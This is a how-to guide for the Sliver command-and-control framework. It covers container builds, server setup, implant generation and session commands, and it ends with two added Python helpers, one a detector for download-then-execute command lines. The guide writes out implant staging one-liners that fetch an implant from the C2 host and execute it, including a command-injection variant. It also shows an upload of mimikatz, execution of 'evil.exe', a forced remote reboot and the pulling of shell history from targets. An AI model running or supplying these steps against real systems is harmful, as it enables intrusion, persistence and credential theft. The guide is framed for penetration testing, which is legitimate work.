This guide documents how to use the Sliver C2 framework, both containerized and installed directly. It covers Docker builds across architectures, server deployment, implant generation, and operational commands for penetration testing.

Environment Setup

First, let’s set up some variables we’ll use throughout this guide:

# Set your GitHub username
GITHUB_USER=l50

# Set container registry path
CONTAINER_REGISTRY=ghcr.io

Building and Pushing Multi-Architecture Sliver Container

Building for Multiple Architectures

First, build your base Sliver image:

# Build the base image
docker build --target production -t sliver .

Then build for each specific architecture:

# Build for ARM64
docker build --target production --platform linux/arm64 -t sliver:arm64 .

# Build for AMD64
docker build --target production --platform linux/amd64 -t sliver:amd64 .

Tagging Architecture-Specific Images

After building, tag both images for your registry:

# Tag ARM64 image (use the correct image ID from docker images)
docker tag [ARM64_IMAGE_ID] $CONTAINER_REGISTRY/$GITHUB_USER/sliver:arm64

# Tag AMD64 image (use the correct image ID from docker images)
docker tag [AMD64_IMAGE_ID] $CONTAINER_REGISTRY/$GITHUB_USER/sliver:amd64

Authenticating with GitHub Container Registry

# Authenticate with GitHub Container Registry
echo "$GITHUB_TOKEN" | docker login "$CONTAINER_REGISTRY" -u "$GITHUB_USER" --password-stdin

Pushing Architecture-Specific Images

# Push ARM64 image
docker push $CONTAINER_REGISTRY/$GITHUB_USER/sliver:arm64

# Push AMD64 image
docker push $CONTAINER_REGISTRY/$GITHUB_USER/sliver:amd64

Creating and Pushing Multi-Architecture Manifest

# Create multi-architecture manifest
docker manifest create $CONTAINER_REGISTRY/$GITHUB_USER/sliver:latest \
  $CONTAINER_REGISTRY/$GITHUB_USER/sliver:arm64 \
  $CONTAINER_REGISTRY/$GITHUB_USER/sliver:amd64

# (Optional) Add architecture annotations if needed
docker manifest annotate $CONTAINER_REGISTRY/$GITHUB_USER/sliver:latest \
  $CONTAINER_REGISTRY/$GITHUB_USER/sliver:arm64 --arch arm64

docker manifest annotate $CONTAINER_REGISTRY/$GITHUB_USER/sliver:latest \
  $CONTAINER_REGISTRY/$GITHUB_USER/sliver:amd64 --arch amd64

# Push the manifest to create the multi-architecture image
docker manifest push $CONTAINER_REGISTRY/$GITHUB_USER/sliver:latest

Verifying Multi-Architecture Image

# Verify your manifest
docker manifest inspect $CONTAINER_REGISTRY/$GITHUB_USER/sliver:latest

Troubleshooting Permission Issues

If you receive a 403 Forbidden or permission_denied error when pushing:

  1. Ensure your GitHub token has the proper package permissions:

    • write:packages
    • read:packages
    • delete:packages
  2. Update your token’s permissions using:

    gh auth refresh --scopes write:packages,read:packages,delete:packages

This process creates a multi-architecture image at $CONTAINER_REGISTRY/$GITHUB_USER/sliver:latest. When a user pulls it, Docker automatically selects the variant that matches their system architecture.

Server Setup

Create server on AWS Ubuntu 20.04 instance

Start by getting the latest release:

wget $(curl -s https://api.github.com/repos/BishopFox/sliver/releases/latest | jq -r '.assets[].browser_download_url' | grep 'server_linux')

Next, install the required dependencies:

sudo apt-get install -y mingw-w64 binutils-mingw-w64 g++-mingw-w64

Next, unzip and run the server:

unzip sliver-server_linux.zip
chmod +x sliver-server
sudo ./sliver-server

Implant Operations

Prepare Environment

# Create directory for implants
mkdir -p implants

# Get public hostname
EC2_HOSTNAME=$(curl -s 169.254.169.254/latest/meta-data/public-hostname)

Generate Implants

Generate HTTPS implant for Linux

generate --http $EC2_HOSTNAME --save implants/linux_implant --skip-symbols --os linux

Generate HTTPS debug implant

generate --debug --http $EC2_HOSTNAME --save implants/debug_implant --skip-symbols --os linux

Generate MTLS implant for macOS

generate --mtls $EC2_HOSTNAME --save implants/mac_implant --skip-symbols --os mac

Start Listeners

# Start HTTPS listener on port 443
https -l 443

Transfer and Run the Implant

On the server, host the payload for 30 seconds:

pushd implants ; timeout 30 python3 -m http.server 8080 ; popd

On the target, grab and execute it:

wget http://$EC2_HOSTNAME:8080/linux_implant && chmod +x linux_implant && ./linux_implant

For command injection scenarios:

bash -c "cd /tmp && wget http://$EC2_HOSTNAME:8080/linux_implant && chmod +x linux_implant && ./linux_implant &"
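
A defender-side view of the staging one-liners above, as an added example that is not part of the original guide: it parses a process command line (for instance from auditd or EDR telemetry) and reports a file that is downloaded, made executable and run within the same line. The function names, the c2.example.test host and the sample input are constructed for illustration.

```python
import shlex
from pathlib import PurePosixPath

DOWNLOADERS, SHELLS = {"wget", "curl"}, {"sh", "bash"}
OPERATORS = set("();<>|&")  # characters shlex treats as shell punctuation
SAMPLE = ('bash -c "cd /tmp && wget http://c2.example.test:8080/linux_implant'
          ' && chmod +x linux_implant && ./linux_implant &"')  # constructed input

def tokenize(script):
    lex = shlex.shlex(script, posix=True, punctuation_chars=True)
    lex.whitespace_split = True  # keep URLs and paths as single tokens
    lex.commenters = ""          # '#' may appear inside a URL
    return list(lex)

def simple_commands(cmdline):
    """Yield the argv of each simple command, unwrapping `sh -c "<script>"`."""
    toks = tokenize(cmdline)
    if len(toks) >= 3 and PurePosixPath(toks[0]).name in SHELLS and toks[1] == "-c":
        toks = tokenize(toks[2])
    argv = []
    for tok in toks:
        if tok and set(tok) <= OPERATORS:  # &&, ;, |, & end a command
            if argv:
                yield argv
            argv = []
        else:
            argv.append(tok)
    if argv:
        yield argv

def grants_exec(mode):
    """True for chmod modes that set an execute bit (+x, u+x, 755, ...)."""
    if mode.isdigit():
        return any(int(d) & 1 for d in mode[-3:])
    return "+" in mode and "x" in mode.split("+", 1)[1]

def download_then_run(cmdline):
    """Return the file that is fetched, made executable and run, else None."""
    fetched, executable = set(), set()
    for argv in simple_commands(cmdline):
        prog = PurePosixPath(argv[0]).name
        names = {PurePosixPath(a.split("?")[0]).name for a in argv[1:]}
        if prog in DOWNLOADERS:
            fetched |= names      # URL basename or -o/-O target
        elif prog == "chmod" and len(argv) > 2 and grants_exec(argv[1]):
            executable |= names
        elif "/" in argv[0] and prog in fetched & executable:
            return prog
    return None
```

`tokenize` raises `ValueError` on unbalanced quotes; treat such lines as unparsed rather than clean.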

Session Management

List and Manage Implants

# List generated implants
implants

# Delete specific implant
implants rm <implant_name>

List Active Jobs

jobs

Interact with Sessions

# Connect to a session
sessions -i <session_id>

# Get session information
info

# Get a shell on the target
shell

# Exit shell (follow with CTRL+D to return to C2 menu)
exit

File Operations

Download Files

# Download file to server directory
download /home/ubuntu/.bash_history

# Download file to specific location
download /var/log/cloud-init.log loot

Download and Extract Folders

# Download folder as compressed archive
download /path/to/folder loot/folder.tar.gz

# Extract the folder
gunzip < loot/folder.tar.gz | tar -xvf -

Upload Files

# Basic upload syntax
upload local_file remote_location

# Example: Upload mimikatz
wget -P ~/tools https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210511/mimikatz_trunk.zip
upload ~/tools/mimikatz_trunk.zip C:/Temp/mimikatz.zip

Command Execution

# Run a binary
execute C:/temp/evil.exe

# Run a system command
execute shutdown /r /t 0

Troubleshooting

View Error Logs

cat ~/.sliver/logs/sliver.log

Troubleshooting Multi-Architecture Manifest Creation

When creating a multi-architecture manifest, you might encounter this error:

ghcr.io/l50/sliver:arm64 is a manifest list

Problem

This error occurs when one of the images you’re trying to include in your manifest is already a manifest list rather than a simple image. Docker doesn’t allow nesting manifest lists directly.

Solution

Instead of referencing the tag, you need to reference the specific digest for each architecture:

  1. First, inspect the manifest list to find the digests for each architecture:

    # Inspect the ARM64 manifest
    docker manifest inspect $CONTAINER_REGISTRY/$GITHUB_USER/sliver:arm64

    # Inspect the AMD64 manifest
    docker manifest inspect $CONTAINER_REGISTRY/$GITHUB_USER/sliver:amd64

  2. Create your manifest using the specific digests:

    # Create manifest with specific architecture digests
    docker manifest create $CONTAINER_REGISTRY/$GITHUB_USER/sliver:latest \
      $CONTAINER_REGISTRY/$GITHUB_USER/sliver@sha256:<arm64_specific_digest> \
      $CONTAINER_REGISTRY/$GITHUB_USER/sliver@sha256:<amd64_specific_digest>

  3. Push the manifest:

    # Push the manifest
    docker manifest push $CONTAINER_REGISTRY/$GITHUB_USER/sliver:latest

When using the digest reference format, make sure to use the digest that corresponds to the specific architecture you want to include. In the manifest inspection output, look for the digest under the appropriate architecture platform entry.
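
One way to automate the digest lookup and the earlier verification step, as an added example that is not part of the original guide: it reads `docker manifest inspect` JSON, picks the single entry for each architecture, and builds the `docker manifest create` arguments. The sample JSON, the repository name `ghcr.io/example/sliver` and the function names are constructed; the `unknown/unknown` entry is an assumed stand-in for a non-image record such as an attestation.

```python
import json

def sample_inspect(arch, fill):
    """Constructed `docker manifest inspect` output for a tag that is a manifest list."""
    image = {"mediaType": "application/vnd.oci.image.manifest.v1+json",
             "digest": "sha256:" + fill * 64, "size": 1234,
             "platform": {"architecture": arch, "os": "linux"}}
    # Second entry models a non-image manifest (assumed: an attestation record).
    extra = {"mediaType": "application/vnd.oci.image.manifest.v1+json",
             "digest": "sha256:" + "f" * 64, "size": 566,
             "platform": {"architecture": "unknown", "os": "unknown"}}
    return json.dumps({"schemaVersion": 2,
                       "mediaType": "application/vnd.oci.image.index.v1+json",
                       "manifests": [image, extra]})

def digest_for(inspect_json, arch, os_name="linux"):
    """Return the digest of the one os/arch image inside a manifest list."""
    doc = json.loads(inspect_json)
    if "manifests" not in doc:
        raise ValueError("not a manifest list; reference the tag itself")
    hits = [m["digest"] for m in doc["manifests"]
            if (m.get("platform") or {}).get("architecture") == arch
            and (m.get("platform") or {}).get("os") == os_name]
    if len(hits) != 1:  # refuse to guess between zero or several candidates
        raise ValueError(f"expected one {os_name}/{arch} entry, found {len(hits)}")
    return hits[0]

def manifest_create_argv(repo, tag, inspected):
    """Build the `docker manifest create` argv from {arch: inspect_json}."""
    refs = [f"{repo}@{digest_for(doc, arch)}"
            for arch, doc in sorted(inspected.items())]
    return ["docker", "manifest", "create", f"{repo}:{tag}", *refs]

def covers(inspect_json, wanted=("amd64", "arm64")):
    """Verification step: True if the list carries every wanted architecture."""
    doc = json.loads(inspect_json)
    have = {m["platform"]["architecture"]
            for m in doc.get("manifests", []) if "platform" in m}
    return set(wanted) <= have
```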
